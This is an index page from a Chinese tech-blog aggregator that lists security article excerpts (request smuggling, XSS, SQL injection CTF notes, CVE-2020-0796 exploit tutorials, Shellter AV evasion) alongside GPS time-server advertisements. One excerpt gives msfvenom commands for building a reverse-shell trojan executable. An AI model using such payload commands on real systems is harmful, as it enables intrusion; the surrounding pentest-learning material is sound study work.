经验首页 前端设计 程序设计 Java相关 移动开发 数据库/运维 软件/图像 大数据/云计算 其他经验
 网络安全
HTTP request smuggling CL.TE

HTTP request smuggling CL.TE

CL.TE 简介 前端通过Content-Length处理请求,通过反向代理或者负载均衡将请求转发到后端,后端Transfer-Encoding优先级较高,以TE处理请求造成安全问题。 检测 发送如下数据包 POST / HTTP/1.1 Host: ac391f7e1e9af82...[2020/7/23]

学习 bypass csp记录

最近看到一篇bypas csp的记录复现学习下 配置csp 这里直接设置html头达到配置csp的效果。 Content-Security-Policy: script-src ''self'' ''unsafe-inline'' 创建html,加载js,代码如下, <m...[2020/7/22]

GPS卫星定时器(北斗定时设备)产品详解与分析

GPS卫星定时器(北斗定时设备)产品详解与分析 GPS卫星定时器(北斗定时设备)产品详解与分析 京准电子科技官微——ahjzsz 京准电子科技HR-901GB型北斗授时设备 产品介绍   京准电子科技HR-901GB型北斗授时设备是一...[2020/7/22]

北斗GPS卫星同步时钟让采集系统更精准

北斗GPS卫星同步时钟让采集系统更精准 北斗GPS卫星同步时钟让采集系统更精准 京准电子科技官微——ahjzsz 如今,数据采集系统很多,有基于数字信号处理器DSP设计的,也有基于现场可编程门阵列FPGA设计的,这些采集系统尽管采集处理数据能力不差,但大多都...[2020/7/21]

【转载】基于dom的一些前端漏洞

最直接的x —-dom x function trackSearch(query) { document.write(''<img src="/resource image tracker.gif?searchTer...[2020/7/21]

短信接口防恶意攻击短信防盗刷策略

    如下是用户页面交互。输入手机号,即可获取验证码。用户体验方面已经超级简单了。 不过,简单是要有成本的。安全控制方面,程序员得琢磨。   在系统安全、信息安全、系统安全防御领域,短信盗刷是老生常谈的话题了。我们公司的系统也经历过至少3...[2020/7/17]

关于NTP网络授时服务器(网络时钟服务器)概述

关于NTP网络授时服务器(网络时钟服务器)概述 关于NTP网络授时服务器(网络时钟服务器)概述 京准电子科技官微——ahjzsz 京准电子科技HR-901GB型NTP授时服务器 概述   京准电子科技HR-901GB型NTP授时服务器...[2020/7/17]

host解析

首先了解一下什么是hosts文件: hosts是一个没有扩展名的系统文件,可以用记事本等文本编辑工具打开,起作用就是将一些常用的“网址域名”与其对应的“IP地址”建立一个关联的“数据库”,当用户在浏览器中输入一个...[2020/7/13]

X-Forwarded-for漏洞解析

X-Forwarded-for漏洞解析

首先了解X-Forwarded-for(简称:XFF) X-Forwarded-for:简称XFF,它代表客户端,也就是HTTP的请求真实的IP,只有在通过了HTTP代理或者负载均衡器时才会添加该项。它不是RFC中定义的标准请求头信息,Squid 缓存代理服务器的开发人员最早引入了这...[2020/7/13]

CTF-sql-万能密码

CTF-sql-万能密码

以下是我在学习sql注入时的一些感想分享,希望能帮助到大家,如有错误,望指出。   万能密码的种类: ①select * from admin where username =“” and pa word = “” ②ad...[2020/7/13]

CTF-sql-sql约束注入

CTF-sql-sql约束注入

create table user( id int not null auto_increment, username varchar(30) not null, pa word varchar(30) not null, primary...[2020/7/13]

CTF-sql-order by盲注

CTF-sql-order by盲注

本文章只讨论了order by盲注,关于order by的报错等注入不在本文章讨论范围,另有文章。 让我们先来看看本文章所使用的表的内容,如下图: 接下来先了解一下order by的基础知识: order by子句 作用:对查询返回的结果按一列或多列排序。 语法格式:ORDER ...[2020/7/13]

CTF-sql-group by报错注入

CTF-sql-group by报错注入

本文章主要涉及group by报错注入的原理讲解,如有错误,望指出。(附有目录,如需查看请点右下角) 一、下图为本次文章所使用到 user表,该表所在的数据库为 test 二、首先介绍一下本文章所使用的到的语法:(第5、6条必须看,这涉及到之后的原理讲解) 1、group by语句:用...[2020/7/13]

GPS对时设备(北斗授时服务器)为您开启精准时刻

GPS对时设备(北斗授时服务器)为您开启精准时刻

GPS对时设备(北斗授时服务器)为您开启精准时刻 GPS对时设备(北斗授时服务器)为您开启精准时刻 京准电子科技官微——ahjzsz 在现代电网中,统一的时间系统对于电力系统的故障分析、监视控制及运行管理具有重要意义。变电站的对时是指站内的保护、测量、监控设...[2020/7/13]

CTF-sql-宽字节注入

本文章主要涉及sql宽字节注入注入的原理讲解,如有错误,望指出。(附有目录,如需查看请点右下角) 一、下图为本次文章所使用到 user表,该表所在的数据库为 test。 二、首先介绍一下本篇文章所用到的知识点: 常用到的url编码: 空格:%20 单引号:%27 在sql注入中,单...[2020/7/13]

如何选择GPS时钟服务器?京准来教您

如何选择GPS时钟服务器?京准来教您 如何选择GPS时钟服务器?京准来教您 京准电子科技官微——ahjzsz GPS时钟服务器厂家介绍及价格分析  目前,市场上的NTP网络时间服务器鱼龙混杂,厂家良莠不齐,对此选择一家有实力的厂家及性价比高的NT...[2020/7/13]

带您了解子母钟系统(网络子母钟)京准

带您了解子母钟系统(网络子母钟)京准 带您了解子母钟系统(网络子母钟)京准 京准电子科技官微(ahjzsz) 第一部分  网络时间同步显示系统概述: 医院、学校网络时间同步显示系统是由高精度GPS(北斗)网络母钟、高品质,高稳定性系统网络子钟、智能化控制设备及其它配套设...[2020/7/9]

京准时间同步系统(NTP网络同步时钟)概述

京准时间同步系统(NTP网络同步时钟)概述 京准时间同步系统(NTP网络同步时钟)概述 京准电子科技官微(ahjzsz) 卫星时间同步系统是根据《华东电网统一时钟系统技术规范》、《上海电网GPS时间同步系统技术原则和运行管理规定》和《电力系统时间同步技术规范》设计的时间同步系统,它...[2020/7/6]

xray和360爬虫以及server酱联动形成自动化挖洞以及报警

xray和360爬虫以及server酱联动形成自动化挖洞以及报警 0X00前言 上一篇我们写了xray和360爬虫形成自动化挖洞,但是这需要我们有事没事就去看一眼挖到洞没,很是繁琐,因此我们利用server酱来实现漏洞得自动推送。 0X01server酱简介 「Server酱」,...[2020/7/6]

公司短信平台上的2万块钱,瞬间就被黑光了

公司短信平台上的2万块钱,瞬间就被黑光了

我是风筝,公众号「古时的风筝」,一个兼具深度与广度的程序员鼓励师,一个本打算写诗却写起了代码的田园码农! 文章会收录在 JavaNewBee ,还要更多文章合集。 前两天的中午像往常一样热,太阳不知疲倦的在天空燃烧,热跑了云彩和鸟儿,马上就要点燃空气和我的脑神经。为我和电脑降温的...[2020/7/6]

记一次内网渗透(Web服务器)

记一次内网渗透(Web服务器)

据了解,该web服务器(10.1.1.178)上 C:\consle存储有银行的关键敏感数据。 废话不多说,既然目标明确了,那就直接上nmap扫一波。结果显示该Web服务器存在cve-2012-0152(Microsoft Windows Server RDP拒绝服务漏洞 )、cve-...[2020/7/6]

隐私政策

隐私政策

                                        &nbs...[2020/7/6]

电力自动化系统卫星时钟同步工作的重要性

电力自动化系统卫星时钟同步工作的重要性

电力自动化系统卫星时钟同步工作的重要性 电力自动化系统卫星时钟同步工作的重要性 安徽京准电子科技微X——ahjzsz 2016年,国家电网公司发布了《全面推进智能计量体系建设的意见》,其中,在提升采集效率方面,对负荷管理、有序供电管理、有序用能管理,它的重要...[2020/6/30]

SHA:安全散列算法简析 附实例

SHA:安全散列算法简析 附实例

前言 体能状态先于精神状态,习惯先于决心,聚焦先于喜好。 SHA算法简介 1.1 概述   SHA (Secure Hash Algorithm,译作安全散列算法) 是美国国家安全局 (NSA) 设计,美国国家标准与技术研究院(NIST) 发布的一系列密码散列函数。正式名称为 SHA 的...[2020/6/26]

.Net Core使用JWT进行身份认证

新建.net core web的api项目(.net core版本3.1)   在Value控制器下写一个模拟登录接口,进行简单的名字和密码验证即可。验证通过后会返回一个token。 1 [HttpGet] 2 [Route("a...[2020/6/22]

GPS校时设备,GPS对时产品,NTP授时服务器

GPS校时设备,GPS对时产品,NTP授时服务器

GPS校时设备,GPS对时产品,NTP授时服务器 GPS校时设备,GPS对时产品,NTP授时服务器 GPS校时设备,GPS对时产品,NTP授时服务器  安徽京准电子科技—— www.ahjzsz.com  产品简介 京准电子科技有限...[2020/6/19]

TCP 重置攻击的工作原理

原文链接:https: fuckcloudnative.io/post deploy-k3s-cro -public-cloud/ TCP 重置攻击 是使用一个单一的数据包来执行的,只有几个字节大小。攻击者制作并发送一个伪造的 TCP 重置包来干扰用户和网站的连接,欺骗通信双方终止...[2020/6/19]

漏洞复现笔记:CVE-2020-0796(SMBGhost漏洞)

0x01:概述 CVE-2020-0796(SMBGhost漏洞)是由于Server Me age Block 3.0(SMBv3)协议在处理恶意的压缩数据包时出错所造成的,它可以让远程且未经身份认证的攻击这在目标系统上执行任意代码。 0x02:影响版本 适用于32位系统的Wind...[2020/6/17]

已解决:No 'Access-Control-Allow-Origin'跨域问题

已解决:No 'Access-Control-Allow-Origin'跨域问题

问题分析: 这是常见的跨域请求问题,在前后端分离的项目中常见,前端项目中的请求路径直接用后台请求路径(例如:http: 192.168.1.1:8080/demo/getUser.do),但根据浏览器的网络请求规则,后台Server是不允许这样直接调用的(会被当黑客恶意攻击给拦截掉)。从而导致...[2020/6/9]

IAT表

0X0 0 DLL介绍 DLL翻译器为动态链接库,原来不存在DLL的概念只有,库的概念,编译器会把从库中获取的二进制代码插入到应用程序中。在现在windows操作系统使用了数量庞大的库函数(进程,内存,窗口,消息)采用这种包含库的方式,会造成内存严重的浪费。因此,windows OS...[2020/6/8]

Privacy Policy

Privacy Policy WangChen built the PDF SYNTHESIZER app as a Free app. This SERVICE is provided by WangChen at no cost and is intended for use as...[2020/6/8]

CVE-2020-0796 漏洞复现(rce)含exp教程

CVE-­2020­-0796 漏洞复现(rce)含exp教程 0X00漏洞简介 Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品,Microsoft Windows是一套个人设备使用的操...[2020/6/4]

CVE-2020-0796 漏洞复现(本地提权)

CVE­-2020-­0796 漏洞复现(本地提权) 0X00漏洞简介 Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品,Microsoft Windows是一套个人设备使用的操...[2020/6/4]

Paypal支付不完全指北

啥都不说,先吐槽 Paypal 真心坑爹,跟国内支付完全没法比,能不接入就不接入吧!!! 准备工作 重要事情 Paypal下单支付后,需要主动跟paypal确认收款(capture),否则该笔订单并不是完成状态!!! 账号 自己前往Paypal develop注册一个吧,注...[2020/6/4]

前后端分离项目安全漏洞修复总结

前后端分离项目安全漏洞修复总结

最近项目被安全扫描由于项目设计有问题,暴出来了一些漏洞,在修复的过程中特把经验总结分享。 1.前后端分离和传统架构介绍 项目架构 1.1 前后端不分离 在前后端不分离的应用模式中,前端页面看到的效果都是由后端控制,由后端渲染页面或重定向,也就是后端需要控制前端的展示,前端...[2020/6/2]

wmware下神奇的win10联网问题

今天在vmware中遇到一个神奇的win10联网问题,各种折腾,最后解决了,这里记录一笔: 环境如下: 物理机:win10 home  X64   虚拟机平台:wmware 15.X 虚拟机:win10 enterprise X64 &nb...[2020/5/29]

Git使用命令

一、配置git h 1、检查用户名和邮箱是否配置 git config --global --list 2、配置用户名和邮箱 git config --global user.name "这里换上你的用户名" git config --global user.ema...[2020/5/26]

代理配置

cmd代理   cmd配置代理: set http_proxy=http: 199.199.199.199:9999   cmd清除代理:reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings...[2020/5/25]

【WebGoat】0X00 安装教程

一、什么是 WebGoatWebGoat 是 OWASP 组织研制出的用于进行 web 漏洞实验的应用平台,用来说明 web应用中存在的安全漏洞。WebGoat 运行在带有 java 虚拟机的平台之上,当前提供的训练课程有 30 多个,其中包括:跨站点脚本攻击(XSS)、访问控制、线程安...[2020/5/21]

Enjoy the pain about Moloch

Enjoy the pain about Moloch

这echo出来的啥子嘛?意思是小姐姐有自虐倾向?可若是moloch有汉化包或翻译文件,小姐姐至于这么“享受”install的过程吗?   过程都走过了,那就记录一下吧:1.找个Ubuntu镜像,阿里云镜像不一定合适,可能需要换清华大学开源软件镜像...[2020/5/21]

京准电子,北斗授时产品取代GPS对时设备服务各行业

京准电子,北斗授时产品取代GPS对时设备服务各行业 京准电子,北斗授时产品取代GPS对时设备服务各行业 索取更多资料添+京准电子科技VX——ahjzsz 全篇引言: 对于一个迈入信息社会的现代化大国,导航定位和授时系统至为重要,称之为“最关键的...[2020/5/19]

kali 免杀工具shellter安装以及使用

kali 免杀工具shellter安装以及使用

Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。俗称为免杀 官网:https: www.shellterproject.com/  目前最新版本是7.2,主程序是.exe文件所以在window...[2020/5/19]

挖洞入门_谷歌语法

回想这些年,总感觉忘得总比学得快,思前想后,打算以后通过写播客的形式来记录自己的学习过程。博主是个安全行业刚入门的小白,如有错误也请大佬不吝指教。 0x01:维基百科 0x02:常用语法 字符 * - 通配符 - - 排除项 "" - 整体词 ...[2020/5/18]

关于医院NTP授时服务器(NTP校时服务器)部署工作

关于医院NTP授时服务器(NTP校时服务器)部署工作关于医院NTP授时服务器(NTP校时服务器)部署工作 京准电子科技更多NTP授时服务器资料请加VX——ahjzsz 1.究竟要不要关心医院子母钟系统的配置? 子母钟系统的建成,人们真正得益的是子钟等终端所提...[2020/5/18]

使用sqlmap

使用sqlmap

实验环境要求: 1、安装win7或win10的笔记本或PC电脑一台,硬盘100GB,内存8GB 2、安装VMware? Workstation 14以上 总体目标:基于centos7搭建dvwa web服务靶机,使用主机上的浏览器和kali虚拟机作为攻击机...[2020/5/14]

metasploit 生成木马常用命令

生成反弹木马: 1.  msfvenom -p window meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe    exe文件 2.  msfv...[2020/5/13]

Vulnhb 靶场系列:Jarbas1.0

靶场镜像 官网 信息收集 攻击机kali IP地址 通过nmap 进行主机发现,发现目标机IP地址 nmap -sP 192.168.227.1/24 参数说明: -sP (Ping扫描) 该选项告诉Nmap仅仅 进行ping扫描 (主机发现),然后打印出对扫描做出...[2020/5/13]

NTP校时(网络对时服务器)IPC网络摄像机时钟同步

NTP校时(网络对时服务器)IPC网络摄像机时钟同步

NTP校时(网络对时服务器)IPC网络摄像机时钟同步 更多资料添加京准电子科技官微——ahjzsz 有时候我们去查看录像发现无法正常查到录像并回放录像,排查了硬盘状态和录像计划都是没有问题的,还有什么需要我们去确认下呢? 这个时候我们可以去看下设备时间,可能...[2020/5/11]

GPS网络校时服务器运行体系说明,京准电子科技

GPS网络校时服务器运行体系说明,京准电子科技 GPS网络校时服务器系统,应用于整个时间频率体系中,若要搭建一套完成的系统,就必须满足于系统的产生性和受检性,存在及监查性。 本文主要基于GPS网络校时服务器系统所输出的时间接口协议,对相对的接口协议产生的时间测试问题进行说明 1、G...[2020/5/7]

Kali Linux 2020.1安装以及安装后要做的事

Kali Linux 2020.1安装以及安装后要做的事

一、下载 https: www.kali.org/download 根据自己情况选择,我是要安装在虚拟机里,用不上live,所以我选的是 二、虚拟机安装 我的安装环境是Vmware 15.5,因为安装过程中需要联网,请准备好网络。 1、创建虚拟机 这里仅列出重要步骤 2、开始安装...[2020/5/6]

124
2
记录数:542 页数:1/1112345678910下一页尾页
加载更多
 友情链接: NPS  问卷模板